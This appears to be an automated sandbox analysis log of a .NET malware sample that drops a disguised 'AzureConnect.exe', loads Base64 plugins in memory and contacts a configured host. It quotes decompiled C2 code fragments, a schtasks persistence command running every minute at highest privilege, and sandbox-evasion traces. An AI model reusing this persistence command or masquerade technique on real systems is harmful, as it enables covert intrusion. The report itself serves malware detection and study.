            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (block 2 of 4) | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (reported twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (block 3 of 4) | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (reported twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, windows.storage.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (block 4 of 4) | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (reported twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exe | Sections loaded (in order): kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe (block 1 of 2) | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (reported twice), uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe (block 2 of 2) | Sections loaded (in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (reported twice), uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
            Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: file.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: file.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: file.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: AzureConnect.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: AzureConnect.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: AzureConnect.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: file.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: file.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
            Source: file.exe, Messages.cs | .Net Code: Memory
            Source: AzureConnect.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: AzureConnect.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
            Source: AzureConnect.exe.0.dr, Messages.cs | .Net Code: Memory
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848F100BD pushad ; iretd 0_2_00007FF848F100C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848E1D2A5 pushad ; iretd 2_2_00007FF848E1D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF849002316 push 8B485F92h; iretd 2_2_00007FF84900231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF848DFD2A5 pushad ; iretd 5_2_00007FF848DFD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF848FE2316 push 8B485F94h; iretd 5_2_00007FF848FE231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF848FE9BAA push D000009Bh; iretd 5_2_00007FF848FE9BC1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848E2D2A5 pushad ; iretd 8_2_00007FF848E2D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF849012316 push 8B485F91h; iretd 8_2_00007FF84901231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF848DED2A5 pushad ; iretd 10_2_00007FF848DED2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF848F019DB pushad ; ret 10_2_00007FF848F019E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF848F01075 push E95BD705h; ret 10_2_00007FF848F01239
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF848FD2316 push 8B485F95h; iretd 10_2_00007FF848FD231B
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | Code function: 15_2_00007FF848F300BD pushad ; iretd 15_2_00007FF848F300C1
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | Code function: 16_2_00007FF848F300BD pushad ; iretd 16_2_00007FF848F300C1
            Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe (dropped file)

            Boot Survival

            Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exe Memory allocated: 1450000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\file.exe Memory allocated: 1B200000 memory reserve | memory write watch
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe Memory allocated: A80000 memory reserve | memory write watch
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe Memory allocated: 1A5A0000 memory reserve | memory write watch
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe Memory allocated: F60000 memory reserve | memory write watch
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe Memory allocated: 1AA80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2058
            Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 7794
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6895
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2895
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8078
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1452
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7694
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2018
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8303
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1379
            Source: C:\Users\user\Desktop\file.exe TID: 6224 Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840 Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628 Thread sleep count: 8078 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064 Thread sleep count: 1452 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964 Thread sleep count: 7694 > 30
